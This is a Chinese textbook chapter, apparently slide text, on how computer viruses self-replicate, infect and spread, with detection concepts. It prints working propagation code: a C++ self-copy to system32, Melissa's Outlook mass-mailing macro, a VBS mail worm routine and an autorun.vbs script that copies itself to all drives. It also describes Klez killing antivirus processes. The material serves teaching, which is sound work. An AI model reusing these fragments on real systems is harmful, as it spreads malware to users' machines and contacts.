病毒立计算机病毒第二章35

2计算机病毒的构造本章开始深入讲解病毒的机理构造，是重点内容主要包括：2．1计算机病毒的自我复制2．2计算机病毒的感染机制2．3计算机病毒的传播机制2．4计算机病毒的伪装及变种功能2．1计算机病毒的自我复制

自我复制是计算机病毒的最重要特征，要阐述清楚它为什么具有了自我复制的功能----信息的数字化和可存储是基本；不同病毒的自我复制实现不同.病毒的自我复制功能被绝大多数读者认为是病毒的最奇妙的技术。其实，信息的数字化和机器的拷贝功能是计算机病毒自我复制技术的基础，只不过复制不是由计算机用户操作完成，而是病毒本身来完成，下面将一一介绍。2．1计算机病毒的自我复制2.1.1生物病毒和计算机病毒的复制比较生物病毒的复制生物病毒是一种生物实体，它能够使用细胞所具有的机制和物质对自己进行再制造，离开宿主它不能存在。计算机病毒的复制作为计算机病毒一般具有一下两个特征：1．该段程序寄生于宿主程序中，宿主程序执行时，该段程序首先被执行。即具有寄生性。2．该段程序能够自我复制到其他宿主程序中，即具有传染性。且被感染的程序运行时，病毒程序能够进一步感染其他目标程序，从而使病毒得到传播。能够进行自我复制计算机病毒的执行过程可以这样描述：AtthebeginningisoneSRP--->/*PhaseI:INFECTIONProcess*/A:.~Searchinagivendirectoryiffile..If(fileisfound)then.If(fingerprintinfile)then.Changetonextentryindirectory.gotoA:.else.CopytheSRPcode:TheinfectedcodeofhostmuststartbytheSearchfunctionandamoveisneededtoavoidtooverwritingcode..Savepreinfectionentryofhost.endif.else.Changedirectory.gotoA:.endif/*Phase2:ACTIONProcess*/.If(trigger)thenACTIONprocess.endif.gotopreinfectionentryinhostprogram--->Now:anewSRP.--->Later...alotofSRP‘s.2.1.2计算机病毒自我复制示例

VC写的病毒自我传播的示例：voidCMeCopyDlg::OnMeCopy(){//只所以写这类程序希望大家能明白的是病毒怎么感染和自我传播的,我会把它的各个功能写出来..charsyspath[256]={0},pepath[256]={0};interrsys=::GetWindowsDirectoryA(syspath,255);//获取系统路径;interrpe=::GetCurrentDirectory(256,pepath);//获取当前路径;//---------------这里是没有获取到路径时的处理-----------/*...省略....*/charpath[256]={0};//------------------开始复制文件方法1-----------------------charcomm[256]={0};wsprintf(comm,"xcopy/c/r/y%s\\mecopy.exe%s\\system32\\mecopy.exe",pepath,syspath);//这里设定命令是不管什么只是复制...$_$...wsprintf(path,"系统路径:%s\n程序路径:%s\n拷贝命令:%s"m);MessageBox(path,"GetPath:");//system(comm);//这种复制是用DOS复制的,回有个DOS闪烁一下!回被发现哦...//另外一种复制方法:charpath1[256]={0};charpath2[256]={0};wsprintf(path2,"%s\\system32\\mecopy.exe",syspath);wsprintf(path1,"%s\\mecopy.exe",pepath);intcpyerr=CopyFile(path1,path2,1);if(cpyerr==0){MessageBox("CopyFileError!!");}}2.1.2计算机病毒自我复制示Melissa病毒的自我复制部分的代码片段如下：IfUngaDasOutlook=“Outlook”ThenDasMapiName.Logon“profile”,”password” Fory=1ToDasMapiName.AddressLists.Count SetAddyBook=DasMapiName.AddressLists(y) x=1 SetBreakUmOffASlice=UngaDasOutlook.CreateItem(0) Foroo=1ToAddyBook.AddressEntries.Count Peep=AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.AddPeep x=x+1 Ifx>50Thenoo=AddyBook.AddressEntries.Count Nextoo BreakUmOffASlice.Subject=“ImportrantMessageFrom”&Application.UserName BreakUmOffASlice.Body=“Hereisthatdocumentyouaskedfor...don’tshowanyoneelse;-)” BreakUmOffASlice.Attachments.AddActiveDocument.FullName BreakUmOffASlice.Send Peep=“” NextyDasMapiName.LogoffEndIf2.1.3病毒自我复制的结构和模型

Cohen在1984年为计算机病毒提出了一个形式化的数学模型，这个模型使用图灵机。实际上Cohen的计算机病毒的形式化数学模型与Neumann的自我复制细胞自动机是十分像似的。从Neumann的角度，我们可以说计算机病毒就是一个可以自我复制的细胞自动机。病毒的自我复制结构程下面的金字塔型结构：2.1.3病毒自我复制的结构和模型图2.1病毒自我复制功能的金字塔型结构2.1.4基于自我复制功能的检测

病毒的自我复制的结构和描述有些类似于句子的生成，这是病毒的最根本的一个特征，即使其他的特征不明显，依据自我复制的特征就可以判别是否为病毒，因此本节介绍自我复制在病毒检测中方法和依据，详细而系统的病毒检测将在防治篇中介绍。病毒自我复制功能的检测类似文本的自动生成理论。前面对自我复制功能的描述就是一个有穷自动机的形式。2.1.4基于自我复制功能的检测在自我复制功能的检测过程中，所有的系统调用都被监视器截获，然后被发往复制检测模块，在这里包含了一整套不同的检测和过滤机制。图4.3.一场动作的检测算法2.2计算机病毒的感染机制

2.2.1计算机病毒感染机制的概述2.2.2计算机病毒的目的及实现2.2.3计算机病毒的传染方式2.2.4一个典型病毒的源码(感染部分)剖析2.2.5总结2.2.1计算机病毒感染机制的概述

大多数的病毒都会用如下的一段伪代码来检查某目标是否已被感染（复合的感染是相当明显的）。BEGINIF(infectable_object_found)AND(object_not_already_infected)THEN(infect_object)END下一步就是将病毒代码安装到可被感染的目标中，这可能需要一步或更多的操作来实现，其数目取决于病毒的类型。病毒代码安装的方式有：在引导区中写入一段新代码。将该代码附加于某个程序文件。将宏代码附加于.doc文档。将代码附加于标准系统程序，截断网络服务以便将与受感染文件相连的链接发送到被俘获的email地址中去。2.2.2计算机病毒的目的及实现

那么病毒在什么情况下被首次执行呢?①染有引导型病毒的磁盘在启动计算机时(无论该磁盘是否是真正的DOS引导盘，是否真正将计算机启动成功)，病毒被执行。②文件型病毒在执行染毒EXE和COM文件时被执行。③初始化批处理启动病毒。④混合型病毒在以上几种情况下都被执行。2.2.3计算机病毒的传染方式

引导型感染：引导型病毒的代表有：Brain病毒，Stoned病毒等。寄生感染：病毒将其代码放入宿主程序中，或者在头部或者在尾部亦或者在中部。滋生感染：滋生感染式病毒又名伴侣病毒。破坏性感染：1990年9月产于原西德的Numberone病毒，1991年12月产于加拿大的small38病毒就属于此类。混合感染：既感染文件又感染主引导扇区或Boot扇区的混合感染病毒。交叉感染：2.2.4一个典型感染剖析

“求职信”病毒是最早出现于2001年年底，相继出现了多个变种，专门攻击微软公司Outlook及OutlookExpress的弱点。由于此病毒多以求职为邮件内容，所以很容易迷惑用户，用户只要打开(甚至是预览)带有这种病毒的电子邮件，就能够导致病毒的发作。当病毒驻留系统后可能会强行关闭用户正在进行的正常操作，甚至会删除硬盘上的14种文档。“求职信”病毒程序具有双程序结构，分为蠕虫部分(网络传播)和病毒部分(感染文件，破坏文件)。2.2.4一个典型感染剖析

当“求职信”病毒被激活后(用户打开或预览了带病毒的邮件)，将按下列步骤对系统进行破坏。1.安装木马2.修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceWink***=wink***.exe3.中止反病毒程序ACKWIN32,ALERTSVC,AMON,ANTIVIR,……,NOD32,Norton,……等51个程序4.繁殖病毒将自身复制到本地硬盘、网络映射盘和局域网的共享硬盘上，复制的文件都具有双重扩展名，一般如下：第一个后缀为：BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3、MP8、MPEG、MPQ、5.传播经搜索到的邮件地址发送带病毒的电子邮件，发送的带毒附件的文件名格式和复制的文件名格式是一样的。6.修改可执行文件2.2.5总结随着互联网的日益发展，计算机病毒的危害越来越大，计算机病毒的感染方式也愈来愈多。但病毒的最根本还是自我复制。在整个生命期中还采用了隐藏、加密、触发条件的手法，等等。本人对计算机病毒感染机制进行了叙述，但不尽详略。随着计算机病毒的防治愈加重要，对计算机病毒感染机制的研究也将更深入和广泛。2.3计算机病毒的传播机制

2.3.1计算机病毒的传播方式2.3.2计算机病毒传播原理2.3.3典型网络病毒传播源码分析2.3.4通过移动存储介质传播的原理2.3.1计算机病毒的传播方式

通过网络传播1通过网络的浏览和下载传播2通过电子邮件等传播3通过即时通讯软件传播4通过局域网传播5通过网页或软件等的漏洞进行传播通过移动存储介质传播其它传播方式2.3各种传播途径比例2.3.2计算机病毒传播原理1蠕虫的目标定位①收集电子邮件地址②进行网络共享枚举攻击。③网络扫描和目标指纹攻击。网络蠕虫能够扫描远程系统，他们使用预定义的网络地址类（指IP地址类）表产生随机的IP地址；随机扫描：蠕虫W32/Slammer。Slammer攻击UDP的1434（SQLserver）端口，它不检测IP地址是否有效。2.3.2计算机病毒传播原理

2感染传播①攻击安装了后门的系统。有些蠕虫使用使用其它蠕虫留下的后门接口进行传播，如W32/Borm，它感染安装了BackOrifice的系统。具体攻击过程如下：Ⅰ)随机产生一个IP地址，并用BackOrifice的BO_PING参查看是否安装有后门；Ⅱ)Borm向服务器发送一个BO_HTTP_ENABLE命令，指示BackOrifice在系统上使用TCP协议的12345端口建立HTTP代理服务。Ⅲ)蠕虫连接服务器，用MIME编码上传自己，蠕虫通过BO_PROCESS_SPAWN命令在服务器上运行刚刚上传的可执行程序，进行新的传播。2.3.3典型网络病毒传播源码分析

1蠕虫病毒Worm.Japanize的传播实例2.3.3典型网络病毒传播源码分析2vbs脚本病毒通过网络传播的几种方式及代码分析FunctionmailBroadcast()SetmapiObj=outlookApp.GetNameSpace("MAPI")//获取MAPI的名字空间……ForEachaddrInaddrList//获取每个地址表的Email记录数ForaddrEntIndex=1ToaddrEntCount//遍历地址表的Email地址Setitem=outlookApp.CreateItem(0)//获取一个邮件对象实例SetaddrEnt=addr.AddressEntries(addrEntIndex)//获取具体Email地址item.To=addrEnt.Address//填入收信人地址…..SetattachMents=item.Attachments//定义邮件附件attachMents.AddfileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"item.DeleteAfterSubmit=True//信件提交后自动删除Ifitem.To<>""Thenitem.Send//发送邮件shellObj.regwrite"HKCU\software\Mailtest\mailed","1"//病毒标记，以免重复感染2.3.4通过移动存储介质传播的原理

1主动传播病毒从带毒载体进入内存，一般是利用操作系统的加载机制或引导机制。病毒从内存侵入无毒介质，则利用操作系统的读写磁盘中断向量入口地址或修改加载机制(例如INT13H或INT21H)，使该中断向量指向病毒程序感染模块。内存中的病毒时刻监视着操作系统的每一个操作，这样，一旦系统执行磁盘读写操作或系统功能调用,病毒感染模块就会被激活,感染模块在判断感染条件满足的条件下,把病毒自身感染给被读写的磁盘或被加载的程序，病毒被按照病毒的磁盘储存结构存放在磁盘上，然后再转移到原中断服务程序执行原有的操作。大部分此类的Windows病毒要正确运行，则必须调用API或系统服务。此类计算机病毒感染的一般过程有：①当宿主程序运行时，截取控制权；②寻找感染的突破口；③将病毒代码故人宿主程序。Autorun主动传播事例autorun.vbs：onerrorresumenextSetWshShell=CreateObject("WScript.Shell")if1=0thenelseFori=1to1setOf=CreateObject("Scripting.FileSystemObject")setdir=Of.GetSpecialFolder(1)Setdc=Of.DrivesifWScript.ScriptFullName=dir&"\autorun.vbs"thenisdir=trueelsea=WshShell.Run("autorun.batOpen",0,False)isdir=falseendifForEachdIndcIfd.DriveType=2Ord.DriveType=3or(d.DriveType=1andd<>"A:"andd<>"B:")Thena=WshShell.Run("autorun.bat-"&d,0,True)ifisdirthenOf.CopyFiledir&"\autorun.bat",d&"\",TrueOf.CopyFiledir&"\sxs.exe",d&"\",TrueOf.CopyFiledir&"\autorun.inf",d&"\",TrueOf.CopyFiledir&"\autorun.reg",d&"\",TrueOf.CopyFiledir&"\autorun.vbs",d&"\",TrueelseOf.CopyFile"autorun.bat",d&"\",TrueAutorun传播事例Of.CopyFile"sxs.exe",d&"\",TrueOf.CopyFile"autorun.inf",d&"\",TrueOf.CopyFile"autorun.reg",d&"\",TrueOf.CopyFile"autorun.vbs",d&"\",Trueendifa=WshShell.Run("autorun.bat+"&d,0,True)EndIfnextifisdirthenwscript.sleep60000i=0elsea=WshShell.Run("autorun.bat-"&dir,0,True)Of.CopyFile"autorun.bat",dir&"\",TrueOf.CopyFile"sxs.exe",dir&"\",TrueOf.CopyFile"autorun.inf",dir&"\",TrueOf.CopyFile"autorun.reg",dir&"\",TrueOf.CopyFile"autorun.vbs",dir&"\",Truea=WshShell.Run("autorun.bat+"&dir,0,True)EndifnextEndif2.3.4通过移动存储介质传播的原理2被动传播用户在进行拷贝磁盘或文件时,把一个病毒由一个载体复制到另外一个载体上。或者执行一个染毒的程序时，导致病毒运行而感染。有时病毒会使用一种巧妙的方式诱骗用户执行病毒，病毒把U盘下所有文件夹隐藏，并把自己复制成与原文件夹名称相同的具有文件夹图标的文件，当你点击时病毒会执行自身并且打开隐藏的该名称的文件夹。2.3.5总结

病毒的传播方式是多种多样的，同一种病毒可能有多种传播方式。病毒的传播技术是随着计算机技术的发展而发展。在本节中，简单地讨论了计算机病毒利用网络及移动存储介质的传播原理，着重分析了网络环境下的病毒传播，列出了常用的传播技术。2.4病毒的伪装及变种机制2.4.1